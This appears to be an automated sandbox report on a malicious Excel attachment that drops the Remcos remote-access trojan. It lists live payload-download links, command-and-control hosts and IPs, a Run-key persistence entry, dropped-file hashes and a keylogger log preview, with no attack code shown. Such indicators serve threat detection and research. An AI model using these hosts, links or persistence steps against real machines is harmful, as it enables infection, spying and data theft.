http://ocsp.sectigo.com0	csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gpt	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://f3rtrw.bl.files.1drv.com/y4mx_vDnHSZNTOhTMVLVmQRlGEek-eb6UO4R5ONQLcqQVc4RctseT_K1ezCYuH-Cc-_	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://f3rtrw.bl.files.1drv.com/y4mAd3mcZPGImnMlQzVaLUaRGLF5rJ6dTRnmjMGEyxD33cnd2H9ImAFk6GH06rI3KMc	csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gp/C	csrss.exe, 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
http://www.day.com/dam/1.0	Home Purchase Contract and Property Details.xls, ~DF5534031E748409A6.TMP.0.dr, 31682C44.png.0.dr, ~DF78F515A159E2AA69.TMP.0.dr, 0B430000.0.dr, DF465E1C.emf.0.dr	false	URL Reputation: safe	unknown
https://live.com/	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://qr-in.com/	qr-in.com.url.4.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://qr-in.com/NAvSGzZyX	~DF5534031E748409A6.TMP.0.dr, 0B430000.0.dr	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pmail.com	Efftwcmk.PIF, Efftwcmk.PIF, 0000000B.00000002.464066991.0000000001E92000.00000004.00001000.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474420464.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0C	csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://onedrive.live.com/downlo	csrss.exe, 00000008.00000002.1011774881.000000003287D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=	csrss.exe, 00000008.00000002.1011774881.0000000032868000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
150.171.41.11	dual-spov-0006.spov-dc-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.137.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.92.251.26	wwsaer.duckdns.org	Bulgaria	34368	THEZONEBG	true
188.114.96.3	qr-in.com	European Union	13335	CLOUDFLARENETUS	true
94.156.67.72	unknown	Bulgaria	31420	TERASYST-ASBG	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446719
Start date and time:	2024-05-23 20:19:42 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Home Purchase Contract and Property Details.xls
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winXLS@9/31@13/6
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 89% Number of executed functions: 79 Number of non-executed functions: 218
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer Override analysis time to 51516.3422873744 for current running targets taking high CPU consumption Override analysis time to 103032.684574749 for current running targets taking high CPU consumption Override analysis time to 206065.369149498 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12
Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, odc-bl-files-geo.onedrive.akadns.net
Execution Graph export aborted for target EQNEDT32.EXE, PID 3668 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Home Purchase Contract and Property Details.xls

Simulations

Behavior and APIs

Time	Type	Description
11:21:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Efftwcmk C:\Users\Public\Efftwcmk.url
11:21:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Efftwcmk C:\Users\Public\Efftwcmk.url
14:21:02	API Interceptor	99x Sleep call for process: EQNEDT32.EXE modified
14:21:06	API Interceptor	8413562x Sleep call for process: csrss.exe modified
14:21:24	API Interceptor	8x Sleep call for process: Efftwcmk.PIF modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
150.171.41.11	ZAM#U00d3WIENIE_NR.2405113.exe	Get hash	malicious	DBatLoader	Browse
	11650000000026213681.exe	Get hash	malicious	DBatLoader	Browse
	HFiHWvPsvA.rtf	Get hash	malicious	Remcos, DBatLoader	Browse
	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	20240416-703661.cmd	Get hash	malicious	DBatLoader	Browse
	20240416-703661.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	ONISZCZUK ASSOCIATES Purchase Order.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	82__GT7568.PDF.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	ref_00845-25-03-24.bat	Get hash	malicious	DBatLoader	Browse
	RFQ#30091.CMD.cmd	Get hash	malicious	DBatLoader	Browse
13.107.137.11	Payment Remittance Advice_000000202213.xlsb	Get hash	malicious	Unknown	Browse	onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU
188.114.96.3	SCB REmittance Advice.doc	Get hash	malicious	Lokibot	Browse	rocheholding.top/evie3/five/fre.php
	PI No 20000814C.exe	Get hash	malicious	FormBook	Browse	www.ilodezu.com/z48v/
	https://m.exactag.com/ai.aspx?tc=d9069973bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atvlasestrellas.com%2Fxb%2F97956%2F%2FYy5tdXNjYXRAYW5kYXJpYS5jb20=	Get hash	malicious	HTMLPhisher	Browse	tvlasestrellas.com/favicon.ico
	http://enter-mantagalaxies.com/	Get hash	malicious	Unknown	Browse	enter-mantagalaxies.com/
	56882720_50174358_2024-05-23_203027.xls	Get hash	malicious	Unknown	Browse	qr-in.com/GDKZCby
	Enquiry No. 2421005.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/atBVKxq
	Enquiry No. 2421005.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/atBVKxq
	20240403_Oferta factory..xls	Get hash	malicious	Unknown	Browse	bitly.cx/owdri
	file.exe	Get hash	malicious	CMSBrute	Browse	cutradition.com/pma/
	20240403_Oferta factory..xls	Get hash	malicious	Unknown	Browse	bitly.cx/owdri

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dual-spov-0006.spov-dc-msedge.net	ZAM#U00d3WIENIE_NR.2405113.exe	Get hash	malicious	DBatLoader	Browse	150.171.41.11
	11650000000026213681.exe	Get hash	malicious	DBatLoader	Browse	150.171.41.11
	HFiHWvPsvA.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	150.171.41.11
	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Get hash	malicious	PureLog Stealer, zgRAT	Browse	150.171.41.11
	20240416-703661.cmd	Get hash	malicious	DBatLoader	Browse	150.171.43.11
	20240416-703661.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	150.171.41.11
	DHL Shipping Documents_pdf.vbs	Get hash	malicious	AgentTesla	Browse	150.171.43.11
	ONISZCZUK ASSOCIATES Purchase Order.bat	Get hash	malicious	Remcos, DBatLoader	Browse	150.171.41.11
	82__GT7568.PDF.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	150.171.41.11
	CONFIRMATION ORDER1.bat	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	150.171.43.11
dual-spov-0006.spov-msedge.net	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.139.11
	Adro_ Documents.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	#U015eirket Evrklar#U0131.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.139.11
	ZAM#U00d3WIENIE_NR.2405113.exe	Get hash	malicious	DBatLoader	Browse	13.107.139.11
	https://drivestorage.live/b/shared/lNyF6ygG	Get hash	malicious	Unknown	Browse	13.107.137.11
	11650000000026213681.exe	Get hash	malicious	DBatLoader	Browse	13.107.139.11
	11650000000026213681.exe	Get hash	malicious	DBatLoader	Browse	13.107.139.11
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	13.107.139.11
	ORDEN_NR2405073.exe	Get hash	malicious	DBatLoader	Browse	13.107.137.11
	ORDEN_NR2405073.exe	Get hash	malicious	DBatLoader	Browse	13.107.137.11
qr-in.com	PO 4500025813.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	56882720_50174358_2024-05-23_203027.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	Enquiry No. 2421005.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	56882720_50174358_2024-05-23_203027.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Enquiry No. 2421005.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	56882720_50174358_2024-05-23_203027.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Enquiry No. 2421005.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	ORDIN.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	ORDIN.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	ORDIN.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
geoplugin.net	z10Original-Copy.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	#Inv_PI_{number_12}_pdf.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	msimg32.dll	Get hash	malicious	Remcos	Browse	178.237.33.50
	Adro_ Documents.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	#U015eirket Evrklar#U0131.exe	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	Shipping document.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	Shipping Docu + BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	1716402730d4367c609f5dbfd372f292f11d4ae5e9638f588c70bba3bb92209e7ce6b766d4284.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1716402727777c162c75a91e4b3e07db32916dbe59531408a29e7b737ba3b7c717173a0c28980.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	17164027273924b1df179f71bcdb4f6ddb0b6e02da51a5acba32646b7f91c4ab7945caaa21327.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	20.86.128.223
	https://downloads.imazing.com/windows/iMazing/iMazing3forWindows.exe	Get hash	malicious	PureLog Stealer	Browse	20.22.113.133
	https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	51.138.215.192
	https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni	Get hash	malicious	Unknown	Browse	94.245.104.56
	https://cinematronix-my.sharepoint.com/:b:/g/personal/graeme_cinematronix_net/EaZ0z51iAxdJn-ugpkcdZ_cBkrvCfEjmBY1pEk79hr1h2Q?e=SJ969V	Get hash	malicious	Unknown	Browse	52.104.56.27
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	13.107.213.45
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	13.107.213.60
	http://info.ipreo.com/Privacy-Policy.html	Get hash	malicious	Unknown	Browse	20.190.249.200
	https://laurabingham.org/wp-content/plugins/wp-recipe-maker/downexcel.php	Get hash	malicious	Unknown	Browse	52.109.32.97
	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.139.11
THEZONEBG	V8Y8niXzmL.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	6ZGQp03KWF.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	8LcL1JKgoC.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	e2PfBoVX8B.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	DIINNdhQCF.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	XooIXdKFaW.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	AIFbR8t1fj.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	bDPV6D6zlx.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	QuXveZg4s6.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
	TqSaHq3efJ.elf	Get hash	malicious	Gafgyt	Browse	91.92.240.85
MICROSOFT-CORP-MSN-AS-BLOCKUS	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	20.86.128.223
	https://downloads.imazing.com/windows/iMazing/iMazing3forWindows.exe	Get hash	malicious	PureLog Stealer	Browse	20.22.113.133
	https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	51.138.215.192
	https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni	Get hash	malicious	Unknown	Browse	94.245.104.56
	https://cinematronix-my.sharepoint.com/:b:/g/personal/graeme_cinematronix_net/EaZ0z51iAxdJn-ugpkcdZ_cBkrvCfEjmBY1pEk79hr1h2Q?e=SJ969V	Get hash	malicious	Unknown	Browse	52.104.56.27
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	13.107.213.45
	https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4	Get hash	malicious	HTMLPhisher	Browse	13.107.213.60
	http://info.ipreo.com/Privacy-Policy.html	Get hash	malicious	Unknown	Browse	20.190.249.200
	https://laurabingham.org/wp-content/plugins/wp-recipe-maker/downexcel.php	Get hash	malicious	Unknown	Browse	52.109.32.97
	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.139.11
TERASYST-ASBG	Swift mt103 483932024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	94.156.67.228
	1716402308262aedf7d56a024eb3c1ba5eacf734db4f110a1cdb89ce86eee5e5f3269b8667772.dat-decoded.exe	Get hash	malicious	Remcos	Browse	94.156.69.96
	5021036673.exe	Get hash	malicious	Nanocore, AgentTesla, PureLog Stealer	Browse	94.156.68.219
	hwUz69Q8ZN.exe	Get hash	malicious	XWorm	Browse	94.156.68.231
	Swift copy.exe	Get hash	malicious	XWorm	Browse	94.156.68.231
	IMG1024785000.exe	Get hash	malicious	Nanocore, AgentTesla, PureLog Stealer	Browse	94.156.68.219
	15qMoP89vl.elf	Get hash	malicious	Unknown	Browse	94.156.68.228
	ZQYQWLpDEQ.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.71.230
	kI6xUIRFpY.elf	Get hash	malicious	Unknown	Browse	94.156.68.228
	PAYMENT COPY 02521.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	94.156.68.219
CLOUDFLARENETUS	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	23.227.38.74
	PO 4500025813.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://freexxxth.link	Get hash	malicious	Unknown	Browse	104.21.25.77
	https://freexxxth.link	Get hash	malicious	Unknown	Browse	172.67.223.248
	SCB REmittance Advice.doc	Get hash	malicious	Lokibot	Browse	188.114.97.9
	V_273686.Lnk.lnk	Get hash	malicious	MalLnk	Browse	172.67.217.192
	kam.cmd	Get hash	malicious	GuLoader	Browse	104.21.28.80
	https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1	Get hash	malicious	Unknown	Browse	104.21.39.66
	https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4	Get hash	malicious	HTMLPhisher	Browse	172.64.154.146
	http://all4promos.com	Get hash	malicious	Unknown	Browse	162.247.243.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	1080.xls	Get hash	malicious	Unknown	Browse	13.107.137.11
	Sipari#U015f detaylar#U0131.xls	Get hash	malicious	Unknown	Browse	13.107.137.11
	Drwg.xls	Get hash	malicious	Unknown	Browse	13.107.137.11
	Pepsico RFQ_P1005712.xls	Get hash	malicious	GuLoader	Browse	13.107.137.11
	ENQUIRY OFFER.xls	Get hash	malicious	FormBook	Browse	13.107.137.11
	PHARMACEUTICAL ORDER.xls	Get hash	malicious	Unknown	Browse	13.107.137.11
	Plat#U0103 Factura MTL11852.xls	Get hash	malicious	Remcos	Browse	13.107.137.11
	PON2401071.xls	Get hash	malicious	Remcos	Browse	13.107.137.11
	irlforme.doc	Get hash	malicious	Unknown	Browse	13.107.137.11
	PURCHASE ORDER_REQUEST.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.137.11

Process:	C:\Users\user\AppData\Roaming\csrss.exe
File Type:	data
Category:	dropped
Size (bytes):	476
Entropy (8bit):	3.548383379550099
Encrypted:	false
SSDEEP:	6:6lGGRSE5YcIeeDAlS6lVYwSySNombQDyFAe5q1Ae5ryFgWA7DxbN2fBMMm0v:6lDecLliwhykle5De5rXWItN25MMl
MD5:	E9DDF5BA9EB284BC4948239EA95BF761
SHA1:	ABF6A4E81EFA869EA412A0FA9857083BD851C9D9
SHA-256:	B5F8791F1E3F7397141054055A6B577BDFB09DB91971A33BE7849E1DA81602DA
SHA-512:	8992D04CE7E6E5FDECA66143FA2A6B061483EC7AB8FD866C78AC220184090AAE5062AC21A265CB54AF1EE24E4D68807C6BD65F9670F8136D7E752D33AA30A603
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\notes\logs.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.4./.0.5./.2.3. .1.4.:.2.1.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.N.A.v.S.G.z.Z. .[.R.e.a.d.-.O.n.l.y.]. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].....[.W.i.n.].r.....[.R.u.n.].....[.W.i.n.].r.....[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02568179153757395
Encrypted:	false
SSDEEP:	6:I3DPcHnCvxggLRbQ4UrZzFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPT3Q4yZfvYg3J/
MD5:	1CA4F988D7E4EF4BADE6AF3F29DCFCDC
SHA1:	8585098DF832531CF158AEAAAEF3977304D021A6
SHA-256:	ED9BDFD3E586DB7D368C8EB197A370468FB5925C495ACFD74EDD17C6562F2E74
SHA-512:	F5BD06AE0142152CA9FE111D7A36D947C4AAC12D2E246ECA611ADF038178814A36C998864DE4419CBAA4FD3F79C9C04E991ED39996014C55295BAEE61FB80379
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z..v.O..E..;....MS,...X.F...Fa.q.............................*..7..I.0) ".............;...A..t..:.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

Download File

Process:	C:\Users\user\AppData\Roaming\csrss.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.0179389973066115
Encrypted:	false
SSDEEP:	12:tkluand6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluWdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	6B1D67591EF4EACFA44DA4A6EA0650AA
SHA1:	E656CCCB39B6DF75860136F91CDB011FACAB4609
SHA-256:	6AEB14C82544F677D77650FE6144D5B3FDA8669B2C105DA3A3433B4E3EAE8AB1
SHA-512:	DC3D7E3819B11140A7CC11B637C6B74DBD92AFAD377CBE0A2775D6F7D4CB752E7EC888A82F619242887EBA173CFAEC2F2A1926487B05C7418AAA73DD11DF9C6A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ISO-8859 text, with very long lines (5166), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	37178
Entropy (8bit):	3.5174036971121247
Encrypted:	false
SSDEEP:	384:VhZXB+50YucHlzQ5T/jlCOTbtbYtcQIukOOOjovKd4gqZjRiOMM2L42IVmJQzL+t:VhZg2Y/0T0Tc038lZZvmFn
MD5:	E22EC5F92111A7CA5FC66630C27C7BB9
SHA1:	E2D0AC4192C7C961F561678750299292DDCDDCA8
SHA-256:	1761EC4983A70F982282C58697628F98C42E8F2197874BE62348445A53CCE51A
SHA-512:	A292DC5C0BB8740481AD9CD22F51175E3A640115D440034633498FDE7345B29C12BD203AFED50B6889FEB427CC69A93E1A95070DA7B860F494231A12D85B1F3A
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
